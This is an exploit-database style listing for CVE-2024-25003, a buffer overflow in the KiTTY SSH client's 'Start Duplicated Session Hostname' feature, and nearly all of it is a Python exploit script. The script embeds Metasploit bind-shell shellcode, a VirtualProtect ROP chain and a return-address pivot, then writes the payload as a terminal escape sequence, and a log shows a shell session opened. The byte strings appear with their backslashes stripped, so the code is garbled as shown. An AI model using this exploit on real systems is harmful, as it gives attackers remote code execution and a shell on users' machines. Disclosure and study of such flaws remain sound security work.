KiTTY 0.76.1.13 Start Duplicated Session Hostname Buffer Overflow

2024-03-28
Risk: high.
Local: No
Remote: Yes
CVE: CVE-2024-25003
CWE: CWE-119
SGDB: SGDB-27453
dork:

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b 'x00x07x0ax0dx1bx9cx3Ax40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"x51x53x56x57xdbxd9xd9x74x24xf4x5fx41" buf += b"x49x31xc9x51x59x90x90x81xe9xaexffxff" buf += b"xffxbexd4xa1xc4xf4x31x77x2bx83xefxfc" buf += b"x51x59x90xffxc9x75xf3x5fx5ex5bx59x28" buf += b"x49x46xf4xd4xa1xa4x7dx31x90x04x90x5f" buf += b"xf1xf4x7fx86xadx4fxa6xc0x2axb6xdcxdb" buf += b"x16x8exd2xe5x5ex68xc8xb5xddxc6xd8xf4" buf += b"x60x0bxf9xd5x66x26x06x86xf6x4fxa6xc4" buf += b"x2ax8exc8x5fxedxd5x8cx37xe9xc5x25x85" buf += 
b"x2ax9dxd4xd5x72x4fxbdxccx42xfexbdx5f" buf += b"x95x4fxf5x02x90x3bx58x15x6exc9xf5x13" buf += b"x99x24x81x22xa2xb9x0cxefxdcxe0x81x30" buf += b"xf9x4fxacxf0xa0x17x92x5fxadx8fx7fx8c" buf += b"xbdxc5x27x5fxa5x4fxf5x04x28x80xd0xf0" buf += b"xfax9fx95x8dxfbx95x0bx34xfex9bxaex5f" buf += b"xb3x2fx79x89xc9xf7xc6xd4xa1xacx83xa7" buf += b"x93x9bxa0xbcxedxb3xd2xd3x5ex11x4cx44" buf += b"xa0xc4xf4xfdx65x90xa4xbcx88x44x9fxd4" buf += b"x5ex11x9exdcxf8x94x16x29xe1x94xb4x84" buf += b"xc9x2exfbx0bx41x3bx21x43xc9xc6xf4xc5" buf += b"xfdx4dx12xbexb1x92xa3xbcx63x1fxc3xb3" buf += b"x5ex11xa3xbcx16x2dxccx2bx5ex11xa3xbc" buf += b"xd5x28xcfx35x5ex11xa3x43xc9xb1x9ax99" buf += b"xc0x3bx21xbcxc2xa9x90xd4x28x27xa3x83" buf += b"xf6xf5x02xbexb3x9dxa2x36x5cxa2x33x90" buf += b"x85xf8xf5xd5x2cx80xd0xc4x67xc4xb0x80" buf += b"xf1x92xa2x82xe7x92xbax82xf7x97xa2xbc" buf += b"xd8x08xcbx52x5ex11x7dx34xefx92xb2x2b" buf += b"x91xacxfcx53xbcxa4x0bx01x1ax34x41x76" buf += b"xf7xacx52x41x1cx59x0bx01x9dxc2x88xde" buf += b"x21x3fx14xa1xa4x7fxb3xc7xd3xabx9exd4" buf += b"xf2x3bx21" def shellcode(): sc = b'' sc += b'xBBx44x24x44x44' # mov ebx,0x44442444 sc += b'xB8x44x44x44x44' # mov eax,0x44444444 sc += b'x29xD8' # sub eax,ebx sc += b'x29xC4' # sub esp,eax sc += buf sc += b'x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &amp;VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; 
ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &amp;Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: x00x07x0ax0dx1bx9cx3Ax40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'x90' * 35 nops = b'x90' * 88 escape_sequence = b'33]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'x90' escape_sequence += b"xE9x2AxFAxFFxFF" #jmp $eip-1490 escape_sequence += nops + b'07' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()


